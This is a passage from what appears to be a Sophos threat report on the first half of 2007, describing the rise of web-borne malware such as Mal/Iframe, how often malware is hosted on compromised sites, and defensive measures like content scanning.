The first six months of 2007 continued 2006's trend of rapidly mutating virus and spam campaigns. Small targeted attacks were favored rather than the large-scale, high-profile attacks of a few years ago. The web in particular continued to be a growing and significant source of threats, being overrun with Trojans, spyware and adware, potentially unwanted applications and undesirable websites.
25 years ago, the first virus (called Elk Cloner) was written by a 15-year-old prankster to infect Apple II floppy disks and display a poem every 50th computer boot. Since then, things have changed somewhat. By June 2007, Sophos was protecting against 257,313 threats, 49,629 of them new since the end of December 2006. The motivation continued to be financial – spyware-infected websites, spammed email and traditional desktop threats all aimed at stealing confidential information or generating income. Increased flexibility in working practices, new and more complex operational threat methods, and a raft of new scams have continued to place a heavy burden on businesses. New laws are being applied with increasing vigor, but once again the threat landscape remains challenging for the months ahead.
Web threats on the rise
The biggest change we have seen over the last three years is the rise in the web as a significant weapon in the cybercriminals' armory. Now an indispensable business tool, the web is still a relatively unprotected route to the users' desktops and laptops. Once infected, these compromised computers can be used to steal confidential data and trade secrets or to spam out millions of emails.
The real change is the way in which users' computers are infected. Previously, virus writers relied on a user downloading an infected file (which would probably have been detected and blocked by desktop anti-virus anyway). Infected email attachments sent directly to users proved to be the bigger threat. Today, spyware and other malware is placed on a website and users are lured to the compromised webpages via spammed email invitations. The type of website is immaterial: gardening and cookery websites are as likely to be infected as gambling or pornography sites.
Top of the list of web-based threats in January to June 2007, accounting for nearly half the world's infected webpages, is Mal/Iframe. It works by injecting malicious code into web pages and is a perfect example of a prolific web threat that targets vulnerable sites.
Interestingly, Sophos research shows that only about 1 in 5 infected websites is malicious by design: about 80 percent of all web-based malware is being hosted on innocent, but compromised, websites.
Because many threats are specifically designed to attack web-related files – such as HTML, ASP, JS and VBS – an infection on a web server can affect hundreds or even thousands of web files. These in turn may form part of hundreds of different webpages published from the same server. This volume, coupled with the speed with which the code can be subtly altered and downloaded, is what makes this threat vector so significant.
Organizations need to apply the same structured, routine security measures at the web, at the email gateway, and at their desktops and servers. The first step is to educate users so that they understand the threat, surf the web safely and preserve the integrity of their organization. After that there are three important areas.
Block by content
A secure web defense will scan pages for malicious content, regardless of whether or not the site is one that you would normally consider "safe". On-access scanning for malware helps prevent infection in the first place and also prevents already-infected files from being used, while stopping you from accidentally serving up malicious content. This has to be an ongoing process as infected sites do get cleaned, not just by administrators but also sometimes by the hackers themselves removing their malicious code before it is detected.
In all this, speed is paramount. Phishing and spam websites are often created and dismantled in a matter of hours. Their purpose is to catch visitors without alerting the authorities or being blocked by security products. Sophisticated automated analysis, such as techniques which take a fraction of a second to look for thousands of clues, allows reputable security vendors to block access to suspect and misleading webpages very quickly.
